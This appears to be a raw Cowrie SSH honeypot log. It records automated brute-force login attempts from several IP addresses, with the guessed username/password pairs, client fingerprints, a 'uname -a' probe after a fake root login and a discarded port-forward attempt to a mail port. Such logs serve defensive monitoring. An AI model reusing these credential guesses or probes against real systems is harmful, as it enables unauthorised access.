{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0003\u0001\\xa5\u0001\u0000\u0001\\xa1\u0003\u0003\u0007\\xe0\\xff=0\\xd6?4\\xa3\\xdb\u0012\\xb6\u0018\u000e\\xa8\\xff\\x9ds\\xe0O\\xc2p\\xd3\u0003q\"\\xc2\\xd5\\xedj.\\x98 \\x9a?\\x8d!\\xa4\\xd3-","message":"Remote SSH version: \u0016\u0003\u0003\u0001\\xa5\u0001\u0000\u0001\\xa1\u0003\u0003\u0007\\xe0\\xff=0\\xd6?4\\xa3\\xdb\u0012\\xb6\u0018\u000e\\xa8\\xff\\x9ds\\xe0O\\xc2p\\xd3\u0003q\"\\xc2\\xd5\\xedj.\\x98 \\x9a?\\x8d!\\xa4\\xd3-","sensor":"my-vps","timestamp":"2025-08-31T02:27:52.993490Z","src_ip":"91.196.152.109","session":"f18fa38883cd"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:52.994388Z","src_ip":"91.196.152.109","session":"f18fa38883cd"}
{"eventid":"cowrie.session.connect","src_ip":"91.196.152.108","src_port":54005,"dst_ip":"1.2.3.4","dst_port":22,"session":"16b765c03abd","protocol":"ssh","message":"New connection: 91.196.152.108:54005 (1.2.3.4:22) [session: 16b765c03abd]","sensor":"my-vps","timestamp":"2025-08-31T02:27:53.037930Z"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:56.041319Z","src_ip":"91.196.152.108","session":"16b765c03abd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":61489,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e69d61ebc08","protocol":"ssh","message":"New connection: 212.227.125.160:61489 (1.2.3.4:22) [session: 3e69d61ebc08]","sensor":"my-vps","timestamp":"2025-08-31T02:27:59.312006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.5.1","message":"Remote SSH version: SSH-2.0-paramiko_3.5.1","sensor":"my-vps","timestamp":"2025-08-31T02:27:59.313461Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.client.kex","hassh":"a2de0f306611e0957be704f5b0e35a82","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc,aes128-gcm@openssh.com,aes256-gcm@openssh.com;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc","aes128-gcm@openssh.com","aes256-gcm@openssh.com"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a2de0f306611e0957be704f5b0e35a82","sensor":"my-vps","timestamp":"2025-08-31T02:27:59.491706Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.login.success","username":"root","password":"john@123","message":"login attempt [root/john@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:28:00.147597Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:28:00.486637Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T02:28:00.487483Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:00.641948Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:00.651457Z","src_ip":"212.227.125.160","session":"3e69d61ebc08"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":46978,"dst_ip":"1.2.3.4","dst_port":22,"session":"b76b52cf1a80","protocol":"ssh","message":"New connection: 41.226.27.251:46978 (1.2.3.4:22) [session: b76b52cf1a80]","sensor":"my-vps","timestamp":"2025-08-31T02:28:03.866848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:03.910634Z","src_ip":"41.226.27.251","session":"b76b52cf1a80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:28:03.911371Z","src_ip":"41.226.27.251","session":"b76b52cf1a80"}
{"eventid":"cowrie.login.failed","username":"plexserver","password":"plexserver","message":"login attempt [plexserver/plexserver] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:04.112274Z","src_ip":"41.226.27.251","session":"b76b52cf1a80"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:05.403553Z","src_ip":"41.226.27.251","session":"b76b52cf1a80"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":36373,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff544e140e10","protocol":"ssh","message":"New connection: 80.94.95.112:36373 (1.2.3.4:22) [session: ff544e140e10]","sensor":"my-vps","timestamp":"2025-08-31T02:28:08.288494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:28:08.289342Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:28:08.319536Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021981","message":"login attempt [admin/01021981] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:08.526949Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01021976","message":"login attempt [admin/01021976] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:09.559478Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50154,"dst_ip":"1.2.3.4","dst_port":22,"session":"1f7bc8b9003d","protocol":"ssh","message":"New connection: 212.227.235.229:50154 (1.2.3.4:22) [session: 1f7bc8b9003d]","sensor":"my-vps","timestamp":"2025-08-31T02:28:09.657351Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"01011964","message":"login attempt [admin/01011964] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:10.592754Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:10.767146Z","src_ip":"212.227.235.229","session":"1f7bc8b9003d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:28:10.767800Z","src_ip":"212.227.235.229","session":"1f7bc8b9003d"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0077","message":"login attempt [admin/0077] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:11.625219Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.login.failed","username":"admin","password":"zzz123","message":"login attempt [admin/zzz123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:12.657796Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:13.690465Z","src_ip":"80.94.95.112","session":"ff544e140e10"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"welcome","message":"login attempt [elasticsearch/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:16.643877Z","src_ip":"212.227.235.229","session":"1f7bc8b9003d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63655,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3f48ef005fe","protocol":"ssh","message":"New connection: 212.227.235.229:63655 (1.2.3.4:22) [session: c3f48ef005fe]","sensor":"my-vps","timestamp":"2025-08-31T02:28:18.100822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:28:18.101751Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:28:18.229076Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:18.707636Z","src_ip":"212.227.235.229","session":"1f7bc8b9003d"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam","message":"login attempt [sam/sam] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:18.782407Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1","message":"login attempt [sam/sam1] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:19.912711Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam123","message":"login attempt [sam/sam123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:21.043078Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1234","message":"login attempt [sam/sam1234] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:22.173936Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam12345","message":"login attempt [sam/sam12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:23.303898Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44936,"dst_ip":"1.2.3.4","dst_port":22,"session":"8f48982c6f84","protocol":"ssh","message":"New connection: 212.227.235.229:44936 (1.2.3.4:22) [session: 8f48982c6f84]","sensor":"my-vps","timestamp":"2025-08-31T02:28:23.928196Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":54426,"dst_ip":"1.2.3.4","dst_port":22,"session":"7721ae5488a2","protocol":"ssh","message":"New connection: 41.226.27.251:54426 (1.2.3.4:22) [session: 7721ae5488a2]","sensor":"my-vps","timestamp":"2025-08-31T02:28:24.031168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:24.123664Z","src_ip":"41.226.27.251","session":"7721ae5488a2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:28:24.132431Z","src_ip":"41.226.27.251","session":"7721ae5488a2"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"sonar123","message":"login attempt [sonar/sonar123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:24.294916Z","src_ip":"41.226.27.251","session":"7721ae5488a2"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:24.432973Z","src_ip":"212.227.235.229","session":"c3f48ef005fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:25.489886Z","src_ip":"41.226.27.251","session":"7721ae5488a2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36060,"dst_ip":"1.2.3.4","dst_port":22,"session":"b876cf380788","protocol":"ssh","message":"New connection: 212.227.125.160:36060 (1.2.3.4:22) [session: b876cf380788]","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.174214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.175115Z","src_ip":"212.227.125.160","session":"b876cf380788"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.255265Z","src_ip":"212.227.125.160","session":"b876cf380788"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.662834Z","src_ip":"212.227.125.160","session":"b876cf380788"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.743941Z","session":"b876cf380788"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.824100Z","src_ip":"212.227.125.160","session":"b876cf380788"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:28:26.918860Z","src_ip":"212.227.125.160","session":"b876cf380788"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40990,"dst_ip":"1.2.3.4","dst_port":22,"session":"d77666a2b6ce","protocol":"ssh","message":"New connection: 212.227.125.160:40990 (1.2.3.4:22) [session: d77666a2b6ce]","sensor":"my-vps","timestamp":"2025-08-31T02:28:31.472963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:32.055170Z","src_ip":"212.227.125.160","session":"d77666a2b6ce"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:28:32.097026Z","src_ip":"212.227.125.160","session":"d77666a2b6ce"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"welcome","message":"login attempt [elasticsearch/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T02:28:34.452144Z","src_ip":"212.227.125.160","session":"d77666a2b6ce"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:28:34.672700Z","src_ip":"212.227.235.229","session":"8f48982c6f84"}
